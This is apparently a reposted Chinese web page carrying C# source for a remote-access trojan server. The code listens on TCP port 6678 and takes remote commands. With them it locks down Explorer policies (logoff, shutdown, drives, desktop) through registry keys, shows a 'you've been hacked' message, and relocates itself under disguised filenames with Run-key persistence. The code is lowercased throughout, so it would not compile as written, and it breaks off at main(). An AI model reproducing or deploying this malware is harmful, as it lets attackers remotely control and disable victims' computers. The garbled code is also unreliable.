IDC资讯中心
特洛伊木马服务器
//wgscd 2004-12 qq:153964481
using system;
using system.drawing;
using system.collections;
using system.componentmodel;
using system.windows.forms;
using system.data;
using system.io;
using system.net;
using system.net.sockets;
using system.threading;
using microsoft.win32;
namespace server
{
/// <summary>
/// form1 的摘要说明。
/// </summary>
public class form1 : system.windows.forms.form
{
/// <summary>
/// 必需的设计器变量。
/// </summary>
private system.componentmodel.container components = null;
private tcplistener listener;
private string mystr="您好!非常抱歉,您的注册表:";
private registrykey rrr=registry.localmachine;
private registrykey key1;
public form1()
{
//
// windows 窗体设计器支持所必需的
//
initializecomponent();
{int port =6678;
listener=new tcplistener(port);
listener.start();
thread thread=new thread(new threadstart(target));
thread.start();
}
//
// todo: 在 initializecomponent 调用后添加任何构造函数代码
//
}
public void target()
{
socket socket= listener.acceptsocket();
while(socket.connected)
{
byte[] by=new byte[6];
int i=socket.receive(by,by.length,0);
string ss=system.text.encoding.ascii.getstring(by);
//ooooooooooooooooooooooooooo以下是修改注册表ooooooooooooooooooooooooooo
//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
if(ss=="jiance")
{
string str="hjc";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}
if(ss=="zx1000")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nologoff",1);
key1.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nologoff被修改!请将它置为0!";
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nologoff",1);
key2.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nologoff被修改!请将它置为0!";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if(ss=="")
//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
//****************************************************************************
if(ss=="zx0100")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("noclose",1);
key1.close();
mystr=mystr+"localmachine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值noclose被修改!请将它置为0!";
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("noclose",1);
key2.close();
mystr=mystr+"localmachine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值noclose被修改!请将它置为0!";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if(ss=="zx0100"){
//****************************************************************************
//++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
if(ss=="zx0010")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nodrives",12);
key1.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nodrives被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nodrives",12);
key2.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nodrives被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
//====================================================================
if(ss=="zx0001")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nodesktop",1);
key1.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nodesktop被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nodesktop",1);
key2.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nodesktop被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//=========================================================================
//$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
if(ss=="zx1100")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nologoff",1);
key1.setvalue("noclose",1);
key1.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nologoff、noclose被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nologoff",1);
key2.setvalue("noclose",1);
key2.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nologoff、noclose被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
if(ss=="zx1010")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nologoff",1);
key1.setvalue("nodrives",12);
key1.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nologoff、nodrives被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nologoff",1);
key2.setvalue("nodrives",12);
key2.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nologoff、nodrives被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//**************************************************
if(ss=="zx1001")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nologoff",1);
key1.setvalue("nodesktop",1);
key1.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nologoff、nodesktop被修改!请将它置为0";
}
catch(exception ee){messagebox.show(ee.message);}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nologoff",1);
key2.setvalue("nodesktop",1);
key2.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nologoff、nodesktop被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//********************************************
if(ss=="zx0110")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("noclose",1);
key1.setvalue("nodrives",12);
key1.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值noclose、nodrives被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("noclose",1);
key2.setvalue("nodrives",12);
key2.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值noclose、nodrives被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//********************************************
if(ss=="zx0101")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("noclose",1);
key1.setvalue("nodesktop",1);
key1.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值noclose、nodesktop被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("noclose",1);
key2.setvalue("nodesktop",1);
key2.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值noclose、、nodesktop被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//********************************
if(ss=="zx0011")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nodrives",12);
key1.setvalue("nodesktop",1);
key1.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nodrives、nodesktop被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nodrives",12);
key2.setvalue("nodesktop",1);
key2.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nodrives、nodesktop被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//************************************
if(ss=="zx1110")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nologoff",1);
key1.setvalue("noclose",1);
key1.setvalue("nodrives",12);
key1.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nologoff、noclose、nodrives被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nologoff",1);
key2.setvalue("noclose",1);
key2.setvalue("nodrives",12);
key2.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nologoff、noclose、nodrives被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//**************************************
if(ss=="zx1101")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nologoff",1);
key1.setvalue("noclose",1);
key1.setvalue("nodesktop",1);
key1.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nologoff、noclose、nodesktop被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nologoff",1);
key2.setvalue("noclose",1);
key2.setvalue("nodesktop",1);
key2.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nologoff、noclose、nodesktop被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//******************************************
if(ss=="zx1011")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nologoff",1);
key1.setvalue("nodrives",12);
key1.setvalue("nodesktop",1);
key1.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nologoff、nodrives、nodesktop被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nologoff",1);
key2.setvalue("nodrives",12);
key2.setvalue("nodesktop",1);
key2.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nologoff、nodrives、nodesktop被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//********************************************
if(ss=="zx0111")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nodrives",12);
key1.setvalue("noclose",1);
key1.setvalue("nodesktop",1);
key1.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值noclose、nodrives、nodesktop被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nodrives",12);
key2.setvalue("noclose",1);
key2.setvalue("nodesktop",1);
key2.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值noclose、nodrives、nodesktop被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//********************************************
if(ss=="zx1111")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nologoff",1);
key1.setvalue("noclose",1);
key1.setvalue("nodrives",12);
key1.setvalue("nodesktop",1);
key1.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nologoff、noclose、nodrives、nodesktop被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nologoff",1);
key2.setvalue("noclose",1);
key2.setvalue("nodrives",12);
key2.setvalue("nodesktop",1);
key2.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nologoff、noclose、nodrives、nodesktop被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//*********************************************
//ooooooooooooooooooooooooooo以上是修改注册表oooooooooooooooooooooooooooooooo
//pppppppppppppppppppppppppppp以下是善意修改部分ppppppppppppppppppppppppppppp
//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
if(ss=="zs1000")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nologoff",0);
key1.close();
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nologoff",0);
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if(ss=="")
//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
//***********************************************************************
if(ss=="zs0100")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("noclose",0);
key1.close();
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("noclose",0);
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if(ss=="zx0100"){
//********************************************************************
//++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
if(ss=="zs0010")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nodrives",0);
key1.close();
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nodrives",0);
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
//==================================================================
if(ss=="zs0001")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nodesktop",0);
key1.close();
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nodesktop",0);
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//=========================================================================
if(ss=="zs1100")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nologoff",0);
key1.setvalue("noclose",0);
key1.close();
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nologoff",0);
key2.setvalue("noclose",0);
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
if(ss=="zs1010")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nologoff",0);
key1.setvalue("nodrives",0);
key1.close();
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nologoff",0);
key2.setvalue("nodrives",0);
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//**************************************************
if(ss=="zs1001")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nologoff",0);
key1.setvalue("nodesktop",0);
key1.close();
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nologoff",0);
key2.setvalue("nodesktop",0);
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//********************************************
if(ss=="zs0110")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("noclose",0);
key1.setvalue("nodrives",0);
key1.close();
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("noclose",0);
key2.setvalue("nodrives",0);
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//********************************************
if(ss=="zs0101")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("noclose",0);
key1.setvalue("nodesktop",0);
key1.close();
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("noclose",0);
key2.setvalue("nodesktop",0);
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//********************************
if(ss=="zs0011")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nodrives",0);
key1.setvalue("nodesktop",0);
key1.close();
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nodrives",0);
key2.setvalue("nodesktop",0);
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//************************************
if(ss=="zs1110")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nologoff",0);
key1.setvalue("noclose",0);
key1.setvalue("nodrives",0);
key1.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nologoff、noclose、nodrives被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nologoff",0);
key2.setvalue("noclose",0);
key2.setvalue("nodrives",0);
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//**************************************
if(ss=="zs1101")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nologoff",0);
key1.setvalue("noclose",0);
key1.setvalue("nodesktop",0);
key1.close();
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nologoff",0);
key2.setvalue("noclose",0);
key2.setvalue("nodesktop",0);
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//******************************************
if(ss=="zs1011")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nologoff",0);
key1.setvalue("nodrives",0);
key1.setvalue("nodesktop",0);
key1.close();
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nologoff",0);
key2.setvalue("nodrives",0);
key2.setvalue("nodesktop",0);
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//********************************************
if(ss=="zs0111")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nodrives",0);
key1.setvalue("noclose",0);
key1.setvalue("nodesktop",0);
key1.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值noclose、nodrives、nodesktop被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nodrives",0);
key2.setvalue("noclose",0);
key2.setvalue("nodesktop",0);
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//********************************************
if(ss=="zs1111")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nologoff",0);
key1.setvalue("noclose",0);
key1.setvalue("nodrives",0);
key1.setvalue("nodesktop",0);
key1.close();
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nologoff",0);
key2.setvalue("noclose",0);
key2.setvalue("nodrives",0);
key2.setvalue("nodesktop",0);
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//pppppppppppppppppppppppppppp以上是善意修改部分pppppppppppppppppppppppppp
//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>以下是警告>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
if(ss=="jg0000")
{
messagebox.show("你被我黑了!");
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}
//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>以上是警告>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&以下是建议&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
if(ss=="jy0000")
{
messagebox.show(mystr);
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}
//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&以上是建议&&&&&&&&&&&&&&&&&&&&&&&&&&&
//##################################以下是修改木马位置###################
//||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
if(ss=="mw1000")
{
try{ file.move("c:\\winnt\\system\\expleror.exe","c:\\winnt\\system32\\msdoss.exe");}
catch{}
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\run",true);
key1.setvalue("msdoss","c:\\winnt\\system32\\msdoss.exe");
key1.close();
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\run");
key2.setvalue("msdoss","c:\\winnt\\system32\\msdoss.exe");
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}
//|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
//_____________________________________________________________________
if(ss=="mw0100")
{
try{file.move("c:\\winnt\\system\\expleror.exe","d:\\winnt\\system32\\microsoftt.exe");}
catch{}
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\run",true);
key1.setvalue("microsoftt","d:\\winnt\\system32\\microsoftt.exe");
key1.close();
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\run");
key2.setvalue("microsoftt","d:\\winnt\\system32\\microsoftt.exe");
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}
//______________________________________________________________________
//=======================================================================
if(ss=="mw0010")
{
try{file.move("c:\\winnt\\system32\\msdoss.exe","c:\\winnt\\system\\expleror.exe");}
catch{}
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\run",true);
key1.setvalue("expleror","c:\\winnt\\system\\expleror.exe");
key1.close();
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\run");
key2.setvalue("expleror","c:\\winnt\\system\\expleror");
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}
//===================================================================
//*******************************************************************
if(ss=="mw0001")
{
try{file.move("d:\\winnt\\system32\\microsoftt.exe","c:\\winnt\\system\\expleror.exe");}
catch{}
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\run",true);
key1.setvalue("expleror","c:\\winnt\\system\\expleror.exe");
key1.close();
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\run");
key2.setvalue("expleror","c:\\winnt\\system\\expleror");
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}
//*************************************************************************
//##################################以上是改变位置##########################
//··················以下是卸载木马·················
if(ss=="xz0000")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\run",true);
try{key1.deletevalue("expleror");}
catch{}
try{key1.deletevalue("msdoss");}
catch{}
try{key1.deletevalue("microsoftt");}
catch{}
key1.close();
}
catch{}
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}
//··················以上是卸载木马·················
}//socket
//
// todo: add any constructor code after initializecomponent call
//
}//targett
/// <summary>
/// 清理所有正在使用的资源。
/// </summary>
protected override void dispose( bool disposing )
{
if( disposing )
{
if (components != null)
{
components.dispose();
}
}
base.dispose( disposing );
}
#region windows form designer generated code
/// <summary>
/// 设计器支持所需的方法 – 不要使用代码编辑器修改
/// 此方法的内容。
/// </summary>
private void initializecomponent()
{
//
// form1
//
this.autoscalebasesize = new system.drawing.size(6, 14);
this.clientsize = new system.drawing.size(292, 266);
this.name = "form1";
this.text = "form1";
this.load += new system.eventhandler(this.form1_load);
}
#endregion
/// <summary>
/// 应用程序的主入口点。
/// </summary>
[stathread]
static void main()
